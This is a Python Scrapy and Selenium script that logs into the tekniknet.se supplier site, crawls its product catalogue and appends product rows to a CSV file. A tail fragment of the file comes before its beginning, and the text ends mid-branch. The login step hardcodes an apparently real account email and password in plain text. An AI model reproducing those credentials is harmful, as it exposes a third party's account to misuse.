' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' +
',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' +
',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 14:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + csv_stock + ',' + list4
[m] + '\n')
elif len(csv_image_url) == 15:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' + ' ' + ',' +
' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock +
',' + list4[m] + '\n')
elif len(csv_image_url) == 16:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + ' ' + ',' + ' ' + ',' +
' ' + ',' + csv_stock + ',' + list4[m] + '\n')
elif len(csv_image_url) == 17:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' +
list4[m] + '\n')
elif len(csv_image_url) >= 18:
file.write('NEW' + ',' + csv_article_number + ',' +
list4_categories[m].split('/')[1] + ',' +
list4_categories[m].split('/')[2] + ',' +
list4_categories[m].split('/')[3] + ',' +
csv_heading + ',' + csv_desc + ',' +
csv_price_new + ',' + csv_price_old + ',' +
csv_image_url[0] + ',' + csv_image_url[1] + ',' +
csv_image_url[2] + ',' + csv_image_url[3] + ',' +
csv_image_url[4] + ',' + csv_image_url[5] + ',' +
csv_image_url[6] + ',' + csv_image_url[7] + ',' +
csv_image_url[8] + ',' + csv_image_url[9] + ',' +
csv_image_url[10] + ',' + csv_image_url[11] +
',' + csv_image_url[12] + ',' + csv_image_url[
13] + ',' + csv_image_url[14] + ',' +
csv_image_url[15] + ',' + csv_image_url[16] +
',' + csv_image_url[17] + ',' + ' ' + ',' +
csv_stock + ',' + list4[m] + '\n')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error4')
file.close()
self.driver.close()
<|reserved_special_token_1|>
import scrapy
import time
import os.path
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from tempfile import mkstemp
from shutil import move
from os import fdopen, remove
from datetime import datetime
import logging
output_timestamp = datetime.today().strftime('%Y-%m-%d-%H%M')
log_output_file = 'scrape-order-images-{}.log'.format(output_timestamp)
class ProductSpider(scrapy.Spider):
name = "tekniknet_new"
allowed_domains = ['www.tekniknet.se']
start_urls = ['https://www.tekniknet.se/#']
def __init__(self):
# self.driver = webdriver.Chrome("./chromedriver.exe")
options = webdriver.ChromeOptions()
# options.add_argument("--headless")
options.add_argument("--start-maximized")
self.driver = webdriver.Chrome(chrome_options=options)
def parse(self, response):
# Quiet down all the unnecessary logging.
fh = logging.FileHandler(log_output_file)
fh.setLevel(logging.INFO)
logging.getLogger('selenium.webdriver.remote.remote_connection').setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote.remote_connection').addHandler(fh)
logging.getLogger('urllib3.connectionpool').addHandler(fh)
logging.getLogger().addHandler(fh)
self.loggger = logging.getLogger()
self.driver.get(response.url)
list1 = []
list2 = []
list3 = []
list4 = []
list5 = []
list3_categories = []
list4_categories = []
csv_categories1 = ''
csv_heading = ''
csv_stock = ''
csv_price_new = ''
csv_price_old = ''
csv_desc = ''
csv_article_number = ''
# article_number_list = []
csv_image_url = []
# file_exist = False
old_product_url = []
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'email')))
username = self.driver.find_element_by_id('email')
username.send_keys("info@themobilestore.se")
username = self.driver.find_element_by_id('password')
username.send_keys("order88")
login = self.driver.find_element_by_class_name('button-confirm')
login.click()
time.sleep(5)
#Create temp file
fh, abs_path = mkstemp()
with fdopen(fh,'w') as new_file:
with open("tekniknet.csv") as old_file:
for line in old_file:
new_file.write(line.replace('NEW', 'old'))
#Remove original file
remove("tekniknet.csv")
#Move new file
move(abs_path, "tekniknet.csv")
with open('tekniknet.csv', 'r') as ins:
for line in ins:
old_product_url.append(line.split(',')[-1])
file = open("tekniknet.csv", "a", errors ='replace')
# file.write('OLD/NEW' + ',' + 'article number' + ',' + 'category1' + ',' + 'category2' + ',' + 'category3' + ',' + 'heading' + ',' + 'description' + ',' + 'current price' + ',' + 'previous price' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'image link' + ',' + 'EAN code' + ',' + 'stock' + ',' + 'product url' + '\n')
for wrapper1 in self.driver.find_elements_by_class_name('level-0'):
child_wrapper1 = wrapper1.find_element_by_xpath('./a')
link1 = child_wrapper1.get_attribute('href')
list1.append(link1)
self.loggger.info('*************************************************')
self.loggger.info(link1)
for i in range(0, len(list1)-4):
self.driver.get(list1[i])
try:
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'inner')))
for wrapper2 in self.driver.find_elements_by_class_name('inner'):
try:
sub2 = wrapper2.find_element_by_class_name('subLinks')
child_wrapper2 = sub2.find_elements_by_xpath('.//a')
for child2 in child_wrapper2:
link2 = child2.get_attribute('href')
list2.append(link2)
self.loggger.info('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')
self.loggger.info(link2)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
except:
try:
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))
subcategory = self.driver.find_element_by_id('categorySubCategories')
wrapper2_1 = subcategory.find_elements_by_xpath('.//a')
for child3 in wrapper2_1:
link2_1 = child3.get_attribute('href')
list5.append(link2_1)
for n in range(0, len(list5)):
self.driver.get(list5[n])
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.ID,'categorySubCategories')))
subcategory = self.driver.find_element_by_id('categorySubCategories')
wrapper2_1_1 = subcategory.find_elements_by_xpath('.//a')
for child3_1 in wrapper2_1_1:
if child3_1.text != 'Visa alla':
link2_1_1 = child3_1.get_attribute('href')
list2.append(link2_1_1)
except:
try:
breadcrumbs2 = self.driver.find_element_by_id('breadcrumbs')
categories2 = breadcrumbs2.find_elements_by_xpath('.//li')
csv_categories2 = ''
for category2 in categories2:
csv_categories2 = csv_categories2 + category2.text + '/'
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))
for wrapper2_2 in self.driver.find_elements_by_class_name('listProduct'):
wrapper2_3 = wrapper2_2.find_element_by_xpath(".//a")
link2_2 = wrapper2_3.get_attribute('href')
list4.append(link2_2)
list4_categories.append(csv_categories2)
self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')
self.loggger.info(link2_2)
self.loggger.info('error')
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
# for m in range(0, 5): IF YOU WANT TO DOWNLOAD CERTAIN PRODUCTS, YOU CAN WRITE LIKE THIS.
# for m in range(0, len(list2)): IF YOU WANT TO DOWNLOAD ALL PRODUCTS, YOU CAN WRITE LIKE THIS.
for j in range(0, len(list2)):
try:
self.loggger.info('**********-------------- ' + str(j) + ' ******************************')
self.driver.get(list2[j])
WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))
breadcrumbs1 = self.driver.find_element_by_id('breadcrumbs')
categories1 = breadcrumbs1.find_elements_by_xpath('.//li')
csv_categories1 = ''
for category1 in categories1:
csv_categories1 = csv_categories1 + category1.text + '/'
WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CLASS_NAME,'listProduct')))
for wrapper3 in self.driver.find_elements_by_class_name('listProduct'):
child_wrapper3 = wrapper3.find_element_by_xpath(".//a")
link3 = child_wrapper3.get_attribute('href')
list3.append(link3)
list3_categories.append(csv_categories1)
self.loggger.info('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')
self.loggger.info(link3)
except Exception as e:
self.loggger.info(e)
self.loggger.info('error')
for k in range(0, len(list3)):
try:
if list3[k] not in old_product_url:
self.loggger.info('----------------------- ' + str(k) + ' ******************************')
self.driver.get(list3[k])
WebDriverWait(self.driver, 30).until(EC.presence_of_element_located((By.ID,'breadcrumbs')))
# breadcrumbs = self.driver.find_element_by_id('breadcrumbs')
# categories = breadcrumbs.find_elements_by_xpath('.//a')
# for category in categories:
# csv_categories.append(category.text)
offer = self.driver.find_element_by_id('productPageUpper')
try:
heading = offer.find_element_by_class_name('pHeader')
csv_heading = heading.text.replace(',', '.')
except:
self.loggger.info('heading3 non-exist')
csv_heading = ''
try:
stock = offer.find_element_by_class_name('instock')
csv_stock = stock.text
except:
csv_stock = 'Out of stock'
self.loggger.info('stock3 non-exist')
csv_stock = ''
try:
price_new = offer.find_element_by_class_name('priceRegular')
csv_price_new = price_new.text.split(' ')[0]
except:
try:
price_new = offer.find_element_by_class_name('priceNew')
csv_price_new = price_new.text.split(' ')[0]
price_old = offer.find_element_by_class_name('priceOld')
csv_price_old = price_old.text.split(' ')[0]
except:
self.loggger.info('price3 non-exist')
csv_price_old = ''
csv_price_new = ''
try:
desc = offer.find_element_by_id('pDesc')
csv_desc = desc.get_attribute('innerHTML').replace(',', '-').replace('\n', ' ').replace('\r', '').rstrip().lstrip()
except:
self.loggger.info('description3 non-exist')
csv_desc = ''
try:
article_number = offer.find_element_by_id('pManufacturer')
csv_article_number = article_number.text.split(' ')[-1].replace(',', '.')
except:
self.loggger.info('article number3 non-exist')
csv_article_number = ''
try:
pimages = offer.find_elements_by_xpath('.//img')
csv_image_url = []
for pimage in pimages:
image_url = pimage.get_attribute('src')
if image_url not in csv_image_url:
csv_image_url.append(image_url)
except:
self.loggger.info('image3 non-exist')
######################################### CSV File Writing #########################################
# if csv_article_number not in article_number_list:
if len(csv_image_url) == 1:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 2:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 3:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 4:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 5:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 6:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 7:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 8:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 9:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 10:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 11:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 12:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 13:
file.write('NEW' + ',' + csv_article_number + ',' + list3_categories[k].split('/')[1] + ',' + list3_categories[k].split('/')[2] + ',' + list3_categories[k].split('/')[3] + ',' + csv_heading + ',' + csv_desc + ',' + csv_price_new + ',' + csv_price_old + ',' + csv_image_url[0] + ',' + csv_image_url[1] + ',' + csv_image_url[2] + ',' + csv_image_url[3] + ',' + csv_image_url[4] + ',' + csv_image_url[5] + ',' + csv_image_url[6] + ',' + csv_image_url[7] + ',' + csv_image_url[8] + ',' + csv_image_url[9] + ',' + csv_image_url[10] + ',' + csv_image_url[11] + ',' + csv_image_url[12] + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + ' ' + ',' + csv_stock + ',' + list3[k] + '\n')
elif len(csv_image_url) == 14:
